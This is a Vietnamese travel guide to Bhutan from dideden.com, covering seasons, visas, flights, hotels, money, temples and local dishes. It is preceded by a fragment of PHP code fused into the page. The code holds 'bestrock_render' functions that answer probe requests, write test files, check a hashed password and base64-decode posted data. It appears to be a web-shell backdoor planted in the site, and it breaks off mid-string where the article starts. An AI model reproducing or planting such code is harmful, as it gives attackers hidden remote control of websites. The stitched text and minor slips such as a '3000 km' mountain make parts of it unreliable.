function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Du lịch Bhutan 2023: Khám phá quốc gia hạnh phúc nhất

Du lịch Bhutan 2023: Khám phá quốc gia hạnh phúc nhất

07/03/2023 Đi Để Đến - Group

Bhutan là một đất nước thuộc Nam Á, ẩn mình trong dãy núi Himalaya hùng vĩ cao nhất thế giới. Du lịch Bhutan 2023 vẫn còn rất mới, chưa được nhiều người biết đến. Nơi đây mang đến sự yên bình mà du khách khó có thể tìm thấy ở một nơi nào khác. 

Bhutan hòa hợp vào thiên nhiên với núi non, thung lũng xanh bát ngát khiến cho ai tới đây du lịch cũng phải xao xuyến. Nếu bạn là người yêu thích sự yên lặng của thiên nhiên, núi rừng thì hãy cùng dideden.com khám phá quốc gia hạnh phúc nhất thế giới qua bài viết dưới đây.

DU LỊCH BHUTAN 2023 NÊN ĐI MÙA NÀO?

Bhutan là một đất nước được bao quanh toàn đồi núi và nằm trên cao cách mặt nước biển từ 180 đến 4000 mét. Do vậy khí hậu Bhutan cực kỳ ôn hòa, mát mẻ vào mùa hè nhưng lại cực kỳ khắc nghiệt vào mùa đông với tuyết rơi dày và rét buốt. Khi bạn du lịch Bhutan 2023, bạn sẽ nhận thấy thời tiết nơi đây hiếm khi nào vượt quá 30 độ C.

Thời điểm đẹp nhất mà du khách nên lựa chọn để đi du lịch Bhutan 2023 đó là vào khoảng mùa Xuân và mùa Thu. Mùa Xuân Bhutan rơi vào khoảng tháng 3, tháng 4 còn mùa Thu nằm trong khoảng tháng 9 tới tháng 11 hàng năm. Thời tiết lúc này mát mẻ, trong lành, dễ chịu. Thiên nhiên ban tặng cho Bhutan những thảm cỏ xanh mướt và những loài hoa thì cùng nhau đua nở.

du lich bhutan 2023 - mua xuan

Mùa xuân ở đất nước hạnh phúc Bhutan. Nguồn: Sưu tầm

CHUẨN BỊ GÌ KHI DU LỊCH BHUTAN

1. Xin Visa du lịch Bhutan 2023

Việc xin Visa du lịch Bhutan 2023 đối với người Việt Nam còn tương đối khó khăn. Dù Việt Nam và Bhutan từ lâu cũng đã đặt quan hệ quốc tế nhưng Bhutan vẫn chưa có Đại sứ quán tại Việt Nam và ngược lại. 

Do vậy cách dễ dàng nhất để có thể xin được Visa du lịch Bhutan 2023 đó chính là thông qua các công ty tour lữ hành. Các công ty lữ hành sẽ hỗ trợ du khách làm thủ tục và chuẩn bị đầy đủ giấy tờ. Bhutan cũng là một đất nước hướng tới du lịch xanh và thân thiện với du khách nên hãy lựa chọn công ty lữ hành uy tín để có thể đi tới Bhutan du lịch thành công.

>>> Xem thêm: “Tấm chiếu mới” đi đâu? Du lịch trong nước hay quốc tế?

2. Đặt vé máy bay đi du lịch Bhutan 

Có hai hãng hàng không tại Bhutan khai thác các chặng bay quốc tế đó là DrukAir và Bhutan Air. Địa hình ở Bhutan chủ yếu là đồi núi. Vì vậy khi ngồi trên máy bay, du khách đừng bỏ lỡ nhìn ngắm dãy Himalaya nổi tiếng. Cảnh tượng tuyệt đẹp này khi nhìn từ trên cao sẽ để lại những ấn tượng khó quên. Nếu du khách đi theo tour đi du lịch Bhutan 2023 thì nhớ theo sát người dẫn đoàn để tránh lạc đường nhé. 

Tuy nhiên tại Bhutan chỉ có 1 sân bay quốc tế ở cách thủ đô đến 65 cây số. Du khách đến Bhutan cần bay quá cảnh ở Bangkok hoặc Delhi hay Kathmandu. Số lượng vé bán rất ít và việc mua vé rất khó khăn. 

du lich bhutan 2023 - ve may bay

Vé máy bay quá cảnh tại Bangkok. Nguồn: Sưu tầm

3. Đặt phòng khách sạn

Thimphu và Paro là hai địa điểm sở hữu nhiều khách sạn cho khách du lịch Bhutan 2023 có thể thoải mái lựa chọn. Đây cũng là nơi tập trung các điểm tham quan và vui chơi đầy hấp dẫn. Khi du lịch Bhutan 2023, du khách lưu ý nên đặt trước ít nhất một tháng để có thể săn được phòng giá tốt, đặc biệt là vào khoảng mùa cao điểm có thể các khách sạn sẽ hết phòng khá sớm.

>>> Xem thêm: Đi du lịch nước ngoài nên đi đâu đẹp nhất?

4. Chuẩn bị tiền khi du lịch Bhutan 

Bhutan sử dụng tiền Ngultrum. Để thuận lợi cho việc thanh toán các chi phí mua sắm trong suốt chuyến du lịch, du khách nên đổi tiền mặt tại sân bay. Lời khuyên cho du khách là nên sử dụng tiền mặt khi du lịch Bhutan 2023 vì ở đây hạn chế dùng thẻ ATM. Đặc biệt, bạn đừng quên dành tiền tip vào phong bì cho tài xế và người dẫn đoàn nhé. 

Giá cả khi du lịch ở đây cực đắt đỏ. Thuế phí được áp dụng với xe riêng, tài xế hay khách sạn và cả tour du lịch. Vì thế đi du lịch Bhutan 2023, bạn cần phải thật sự cân nhắc. 

5. Một số lưu ý khi du lịch Bhutan 2023

Phương tiện di chuyển chính khi du lịch Bhutan 2023 là xe bus, xe hơi và đi bộ. Khi du khách đi du lịch theo tour, việc này sẽ trở nên dễ dàng hơn vì bạn có thể di chuyển tới các địa điểm tham quan. 

Bhutan là quốc gia Phật giáo vì thế khi du lịch ở Bhutan, du khách cần lưu ý mặc trang phục kín, không quá hở hang. Nhất là không được hút thuốc ở Bhutan vì sẽ bị phạt tù hoặc hành chính. 

Du lịch tại Bhutan, bạn có thể sử dụng tiếng anh để giao tiếp. Nếu gặp khó khăn khi nói chuyện với người bản địa, bạn có thể nhờ sự giúp đỡ của hướng dẫn viên. Trước khi đi du lịch Bhutan 2023, bạn nhớ tìm hiểu thật kỹ các điều kiêng kỵ tại đây để tránh gặp phải những rắc rối không đáng có nhé.

MỘT SỐ ĐỊA ĐIỂM DU LỊCH BHUTAN NỔI TIẾNG

1. Tu viện Taktsang

Tu viện Taktsang được đặt trên ngọn núi cao đến gần 3000 km. Đây là nơi hết sức linh thiêng vì từng là nơi tu hành của rất nhiều vị sư. Vào những ngày trời âm u, nhiều mây, tu viện như chìm vào màn mây dày đặc. Đến tu viện vào những ngày như vậy chẳng khác nào lạc vào chốn bồng lai tiên cảnh cực kỳ thanh tịnh. 

du lich bhutan 2023 - tu vien

Tu viện Taktsang nằm trên vị trí cao. Nguồn: Sưu tầm

2. Tu viện Rinpung Dzong

Du lịch Bhutan 2023 thì chắc chắn không thể bỏ qua tu viện Rinpung Dzong. Tu viện này là một công trình kiến trúc tuyệt đẹp có view hướng ra thung lũng Paro. Bức tường vôi và tranh vẽ tại đây cùng 14 ngôi đền là điểm nhấn cực kỳ thu hút khách du lịch. Lối kiến trúc mang hơi hướng cổ xưa nhưng hết sức trang nhã khiến tu viện trở thành điểm đến nhất định du khách phải ghé thăm. 

>>> Xem thêm: Kinh nghiệm du lịch tết Âm lịch nước ngoài Quý Mão 2023

3. Khu bảo tồn Motithang Takin

Khu bảo tồn Motithang Takin là nơi sở hữu và bảo tồn những loài động vật quý hiếm. Diện tích của khu bảo tồn lên đến 34.000 mét vuông. Cổng vào của khu bảo tồn được thiết kế đậm chất truyền thống. Du khách có thể tham khảo các thông tin cần thiết ở trung tâm thông tin tại khu bảo tồn. Hiện nay, khu bảo tồn này chủ yếu được lập nên nhằm bảo vệ loài linh ngưu. 

4. Núi Chomo Hari

Núi Chomo Hari có độ cao tầm 5000 mét. Chuyến leo núi Chomo Hari dành cho người đam mê phiêu lưu thường kéo dài trong vòng từ 7 cho đến 15 ngày. Những người thích leo núi khi du lịch Bhutan 2023 chắc chắn không thể bỏ lỡ địa điểm này. Đây chính là nơi dành cho bạn. 

du lich bhutan 2023 - nui Chomo Hari

Khám phá ngọn núi Chomo Hari trong chuyến du lịch Bhutan 2023. Nguồn: Sưu tầm

5. Pháo đài Punakha Dzong

Pháo đài Punakha Dzong có vẻ đẹp không khác nào một bức tranh. Phong cảnh hùng vĩ từ ngọn núi cho đến dòng sông chảy quanh khiến nơi đây trở nên rất hữu tình. Công trình pháo đài Punakha Dzong được xây dựng kiên cố và kỳ vĩ. Du khách đi du lịch Bhutan 2023 sẽ choáng ngợp trước lối thiết kế tinh xảo và nét đẹp độc đáo của điểm tham quan này. 

6. Đèo Dochula

Cảnh bình minh và hoàng hôn ở đèo Dochula chính là khoảnh khắc mà vị du khách nào khi du lịch Bhutan 2023 cũng mong đợi. Đèo được phủ ngập bởi tuyết trắng tạo nên phong cảnh rất lãng mạn và thơ mộng. Đèo Dochula còn là nơi ghi ơn vị anh hùng đã ngã xuống trong cuộc chiến chống lại người Ấn Độ. 

du lich bhutan 2023 - deo dochula

Quang cảnh trên đèo Dochula. Nguồn: Sưu tầm

7. Bảo tàng quốc gia Bhutan

Khi du lịch tại một quốc gia, để tìm hiểu rõ nét về văn hóa hay lịch sử của quốc gia đó chắc chắn du khách phải ghé đến bảo tàng. Bảo tàng quốc gia Bhutan là nơi lưu trữ rất nhiều tư liệu cũng như hiện vật của Bhutan từ trước đến nay. Tham quan bảo tàng quốc gia, du khách cũng như được sống lại thời kỳ lịch sử của Bhutan và chiêm ngưỡng những kiệt tác đặc sắc mà chỉ ở Bhutan mới có. 

>>> Xem thêm: Du lịch Paris: Những kinh nghiệm chắc chắn phải bỏ túi

8. Đài tưởng niệm quốc gia Chorten

Đài tưởng niệm quốc gia Chorten mang phong cách Tây Tạng đặc trưng, được xây dựng để tôn vinh và tưởng nhớ vua Jigme Dorji Wangchuck, vị vua thứ ba của Bhutan. Đài tưởng niệm được mô phỏng theo thiết kế một bảo tháp cổ điển. Xung quanh đài tưởng niệm là một khu vườn nhỏ. Người dân và khách du lịch Bhutan 2023 có thể tới đây tham quan từ 6 giờ sáng đến 6 giờ chiều mỗi ngày.

9. Tượng Phật Dordenma

Tượng Phật Dordenma nằm trong khuôn viên Công viên Tự nhiên Kuensel Phodrang, trên đỉnh của một ngọn đồi. Bức tượng Phật gắn liền với một lời tiên tri cổ. Nhiều người tin rằng bức tượng sẽ đem lại hòa bình, hạnh phúc và phước lành cho cả thế giới. Đây là một địa điểm du lịch Bhutan 2023 mà chắc chắn bạn nên đặt chân tới.  

Bức tượng Đại Phật này có chiều cao lên tới 51.5 mét, thuộc top các bức tượng Phật lớn nhất trên thế giới. Điều đặc biệt của bức tượng này đó chính là bên trong chưa 125 nghìn bức tượng Phật nhỏ hơn. Bức tượng Đại Phật và một vài bức tượng nhỏ được làm bằng đồng và mạ vàng bên ngoài. 

du lich bhutan 2023 - tuong phat

Check-in tại tượng phật Dordenma ở Bhutan. Nguồn: Sưu tầm

10. Đền Kyichu Lhakhang

Kyichu Lhakhang là ngôi đền chùa cổ nhất, là một trong những pháo đài về tôn giáo sớm nhất của đất nước Bhutan xinh đẹp. Nơi đây đã từng được nhiều vị Thánh sư ghé thăm và họ đã ban phước cho ngôi đền này. Kyichu Lhakhang xuất hiện từ thế kỷ thứ VII, người tạo ra ngôi đền chính là Đế quốc Tây Tạng. 

Hàng năm, Kyichu Lhakhang đón hàng trăm nghìn tín đồ Phật giáo và khách du lịch Bhutan 2023 tới đây để chiêm ngưỡng vẻ đẹp của ngôi đền. Ngôi đền có hai cây cam đặc biệt, ra hoa và kết trái quanh năm nên nhiều du khách không khỏi tò mò mà mong muốn tới đây để ngắm nhìn chúng. Nếu bạn là người yêu thích nghệ thuật và văn hóa thì Kyichu Lhakhang là nơi bạn không thể không tới.

NHỮNG MÓN NGON NÊN THỬ KHI ĐI DU LỊCH BHUTAN 2023

1. Ezay

Ezay là một loại tương ớt đặc biệt ở Bhutan, một loại tương ớt có thể dùng để ăn kèm với mọi món ăn của người Bhutan. Ezay có nhiều công thức, thông thường trong Ezay sẽ bao gồm ớt khô, cà chua, hạt tiêu Sichuan và có thể là một chút phô mai. 

2. Gạo đỏ Bhutan

Một món ăn mà khi du lịch Bhutan 2023, bạn có thể gặp ở bất cứ nơi đâu đó là gạo đỏ. Gạo đỏ của người Bhutan có hàm lượng dinh dưỡng cao, được trồng ở những cánh đồng nằm dưới thung lũng Paro. Hạt gạo đỏ Bhutan sau khi nấu chín sẽ chuyển thành cơm màu đỏ nhạt hoặc hồng. Hạt gạo mềm dẻo, thơm ngon.

>>> Xem thêm: Tour du lịch Thái Lan – Khám phá đất nước chùa Vàng

3. Yaksha Shakam

Yak là thịt bò Tây Tạng khô. Yak có mùi vị đậm đà hơn thịt bò thông thường. Thịt Yak được phơi khô sau đó đem đi chế biến. Du khách du lịch Bhutan 2023 có thể thử món Yaksha Shakam với thịt Yak nấu cùng với sữa và phô mai lên men. Đây là một món ăn cực kỳ ngon mà bạn nên thử.

4. Suja

Suja là một loại đồ uống phổ biến vào mùa đông bởi nó giúp người dân vùng núi cao Himalaya làm ấm cơ thể một cách nhanh chóng. Suja được chế biến từ trà, các loại thảo dược, muối và bơ Yak. Chắc chắn Suja sẽ đem lại một hương vị mới lạ với vị thơm của trà, béo ngậy của bơ và hơi mằn mặn của muối hòa quyện trong một món đồ uống.

5. Ema Datshi

Người Bhutan cực kỳ thích ăn ớt và phô mai. Có thể nói hai loại thực phẩm này là trợ thủ đắc lực của những người sống trên vùng núi cao. Chúng giúp cho người dân nơi đây có thể làm ấm thân nhiệt của mình để chống chọi với giá rét. Ema Datshi là món ăn nổi tiếng ở Bhutan với nguyên liệu chính là ớt và phô mai. Món này sử dụng nhiều loại ớt khác nhau, xắt nhỏ và nấu cùng bơ, phô mai béo ngậy.

du lich bhutan 2023 - Ema Datshi

Món ăn là sự kết hợp giữa ớt và phomai. Nguồn: Sưu tầm

6. Bánh Momo

Bánh Momo đơn giản là một loại bánh bao và được bắt nguồn từ Trung Quốc. Món ăn này rất phổ biến ở Bhutan. Bạn có thể ăn Momo hấp hoặc chiên giòn tùy theo sở thích. Đây được coi là một món ăn vặt và dễ dàng thưởng thức ở bất kỳ đâu khi du lịch Bhutan 2023.

>>> Xem thêm: Tour Maldives 4 ngày 3 đêm – Thiên đường nghỉ dưỡng

7. Juma

Juma là một loại xúc xích của người Bhutan. Thay vì nhồi thịt vào ruột lợn như một số nơi, xúc xích Juma còn được nhồi thêm cả gạo và một số loại gia vị khác. Xúc xích Juma sẽ được ăn trực tiếp, không dùng kèm bánh mì như một số nước trên thế giới.

8. Shamu Datshi

Tiếp tục là một món ăn có phô mai, Shamu Datshi là món ăn có rau củ, các loại nấm nấu cùng với phô mai. Shamu Datshi sẽ là món ăn kèm cùng với cơm. Món ăn có độ béo ngậy của phô mai cùng với hương thơm tươi mới của các loại nấm tự nhiên và rau củ được trồng trên vùng núi cao.

9. Phaksha Paa

Phaksha Paa là một món ăn cực kỳ hấp dẫn và sẽ làm hài lòng bất kỳ du khách đói bụng nào. Để nấu Phaksha Paa, người dân Bhutan dùng thịt lợn tươi chiên vàng cùng với các loại ớt đỏ. Món ăn này có màu sắc cực kỳ đẹp mắt, ngon miệng và cực kỳ đưa cơm. Nếu bạn yêu thích ăn cay, hãy thử món ăn này trong chuyến du lịch Bhutan 2023 sắp tới của mình. 

du-lich-bhutan-2023 - Phaksha paa

Đây là món thịt heo xào cùng với ớt. Nguồn: Sưu tầm

10. Kewa Datshi

Kewa Datshi là một món ăn cực kỳ đơn giản với khoai tây được hầm trong bơ và phô mai. Đôi khi người dân Bhutan sẽ cho thêm cả cà chua và ớt chuông khi nấu. Đây là một món ăn dân dã và quen thuộc trong căn nhà của người bản địa nơi đây.

Bài viết trên đây đã cung cấp các kinh nghiệm và lưu ý quan trọng khi du lịch Bhutan 2023. Hy vọng những chia sẻ của dideden.com giúp bạn có thêm góc nhìn mới về quốc gia này và chuẩn bị cho hành trình sắp tới. Nếu bạn còn thắc mắc về các thông tin du lịch Bhutan 2023, liên hệ hotline 1900 3398 để được tư vấn chi tiết. 

ĐĂNG KÍ ĐẶT TOUR DU LỊCH BHUTAN 2023
 

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]